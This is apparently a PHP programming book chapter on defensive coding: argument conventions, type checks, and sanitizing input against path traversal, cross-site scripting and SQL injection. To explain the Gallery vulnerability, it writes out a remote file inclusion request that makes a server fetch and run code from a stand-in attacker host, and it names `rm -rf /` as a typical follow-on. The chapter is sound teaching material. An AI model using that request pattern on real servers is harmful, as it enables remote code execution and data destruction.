Defensive Coding

Defensive coding is the practice of eliminating assumptions in the code, especially when it comes to handling information passed into and out of other routines. In lower-level languages such as C and C++, defensive coding is a different activity. In C, variable type enforcement is handled by the compiler; a user's code must handle cleaning up resources and avoiding buffer overflows. PHP is a high-level language; resource, memory, and buffer management are all handled internally by PHP. PHP is also dynamically typed, which means that you, the developer, are responsible for performing any type checking that is necessary (unless you are using objects, in which case you can use type hints).

There are two keys to effective defensive coding in PHP: establishing standard conventions and using sanitization techniques.
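To make the point about dynamic typing concrete, here is a minimal sketch of a function that checks its own arguments at run time. The names repeat_label() and label_length() and their parameters are hypothetical, invented for illustration; the checks themselves rely only on PHP's built-in is_string() and is_int().

```php
<?php
// Hypothetical helper: repeats a label a given number of times.
// Nothing enforces the argument types for us here, so the function
// verifies them itself before doing any work.
function repeat_label($label, $count)
{
    if (!is_string($label)) {
        throw new InvalidArgumentException('label must be a string');
    }
    if (!is_int($count) || $count < 0) {
        throw new InvalidArgumentException('count must be a non-negative integer');
    }
    return str_repeat($label, $count);
}

// For objects, a type hint in the signature replaces the manual check.
function label_length(ArrayObject $labels)
{
    return count($labels);
}
```

Calling repeat_label('ab', '3') throws, because the string '3' is not an integer. Whether to reject such a value or convert it is a design choice; this sketch assumes rejection is the safer default.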
Establishing Standard Conventions

Defensive coding is not all about attacks. Most bugs occur because of carelessness and false assumptions. The easiest way to make sure other developers use your code correctly is to make sure that all your code follows standards for argument order and return values. Some people argue that comprehensive documentation means that argument ordering doesn't matter. I disagree. Having to reference the manual or your own documentation every time you use a function makes development slow and error prone.

A prime example of inconsistent argument ordering is the MySQL and PostgreSQL PHP client APIs. Here are the prototypes of the query functions from each library:

    resource mysql_query ( string query [, resource connection])
    resource pg_query ( resource connection, string query)

Although this difference is clearly documented, it is nonetheless confusing.

Return values should be similarly well defined and consistent. For Boolean functions, this is simple: Return true on success and false on failure. If you use exceptions for error handling, they should exist in a well-defined hierarchy, as described in Chapter 3.

Using Sanitization Techniques

In late 2002 a widely publicized exploit was found in Gallery, photo album software written in PHP. Gallery used the configuration variable $GALLERY_BASEDIR, which was intended to allow users to change the default base directory for the software. The default behavior left the variable unset. Inside the code, the include statements all looked like this:

    <? require($GALLERY_BASEDIR . "init.php"); ?>

The result was that if the server was running with register_globals on (which was the default behavior in earlier versions of PHP), an attacker could make a request like this:

    http://gallery.example.com/view_photo.php?\
    GALLERY_BASEDIR=http://evil.attackers.com/evilscript.php%3F

This would cause the require to actually evaluate as the following:

    <?
    require("http://evil.attackers.com/evilscript.php?init.php"); ?>

This would then download and execute the specified code from evil.attackers.com. Not good at all. Because PHP is an extremely versatile language, this meant that attackers could execute any local system commands they desired. Examples of attacks included installing backdoors, executing `rm -rf /`;, downloading the password file, and generally performing any imaginable malicious act.

This sort of attack is known as remote command injection because it tricks the remote server into executing code it should not execute. It illustrates a number of security precautions that you should take in every application.
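One way to read the Gallery example is that a path handed to require should never be built from a variable that a request can set. The following is a minimal sketch under that assumption. The function name trusted_include_path() and the naming rule it enforces are hypothetical and are not taken from Gallery itself.

```php
<?php
// Hypothetical helper: build an include path from a fixed base directory
// and a bare filename, rejecting URLs and anything with directory parts.
function trusted_include_path($baseDir, $file)
{
    // Reject URL schemes such as http:// or ftp://
    if (strpos($file, '://') !== false) {
        throw new InvalidArgumentException('remote includes are not allowed');
    }
    // Accept only letters, digits, underscores, and dashes, ending in .php
    if (!preg_match('/^[A-Za-z0-9_-]+\.php$/', $file)) {
        throw new InvalidArgumentException('unexpected include name');
    }
    return rtrim($baseDir, '/') . '/' . $file;
}

// The base directory comes from the script's own location, not from input.
$path = trusted_include_path(__DIR__, 'init.php');
```

The resulting $path could then be passed to require. Because the base directory is derived from __DIR__ rather than from a global variable, a request parameter has no way to redirect the include.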
Data sanitization is an important part of security. If you know your data should not have HTML in it, you can remove HTML with strip_tags, as shown here:

    // username should not contain HTML
    $username = strip_tags($_COOKIE['username']);

Allowing HTML in user-submitted input is an invitation to cross-site scripting attacks. Cross-site scripting attacks are discussed further in Chapter 3, "Error Handling".

Similarly, if a filename is passed in, you can manually verify that it does not backtrack out of the current directory:

    $filename = $_GET['filename'];
    if(substr($filename, 0, 1) == '/' || strstr($filename, "..")) {
      // file is bad
    }

Here's an alternative:

    $file_name = realpath($_GET['filename']);
    $good_path = realpath("./");
    // realpath() returns false for a nonexistent path; strncmp() returns 0 on a match
    if($file_name === false || strncmp($file_name, $good_path, strlen($good_path)) != 0) {
      // file is bad
    }

The latter check is stricter but also more expensive.

Another data sanitization step you should always perform is running mysql_escape_string() (or the function appropriate to your RDBMS) on all data passed into any SQL query. Much as there are remote command injection attacks, there are SQL injection attacks. Using an abstraction layer such as the DB classes developed in Chapter 2, "Object-Oriented Programming Through Design Patterns," can help automate this. Chapter 23, "Writing SAPIs and Extending the Zend Engine," details how to write input filters in C to automatically run sanitization code on the input to every request.

Data validation is a close cousin of data sanitization. People may not use your functions in the way you intend. Failing to validate your inputs not only leaves you open to security holes but can lead to an application functioning incorrectly and to having trash data in a database. Data validation is covered in Chapter 3.
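The realpath() comparison described above can be wrapped in a small helper so that the check is written once and reused. This is a sketch rather than a definitive implementation: the function name is_inside_directory() is hypothetical, and the trailing-separator step is an added assumption intended to keep a directory such as /data/app from matching a sibling such as /data/application.

```php
<?php
// Hypothetical helper: returns true only if $candidate resolves to an
// existing path that is $baseDir itself or lies beneath it.
function is_inside_directory($candidate, $baseDir)
{
    $base = realpath($baseDir);
    $path = realpath($candidate);
    // realpath() returns false when the path does not exist
    if ($base === false || $path === false) {
        return false;
    }
    // Compare with a trailing separator so that a sibling directory
    // sharing the same name prefix is not accepted.
    $prefix = rtrim($base, DIRECTORY_SEPARATOR) . DIRECTORY_SEPARATOR;
    // strncmp() returns 0 when the first strlen($prefix) bytes match
    return strncmp($path . DIRECTORY_SEPARATOR, $prefix, strlen($prefix)) === 0;
}
```

A caller would treat a false result as "file is bad" and refuse the request. Note that a path that does not exist is also rejected, which may or may not suit code that creates new files.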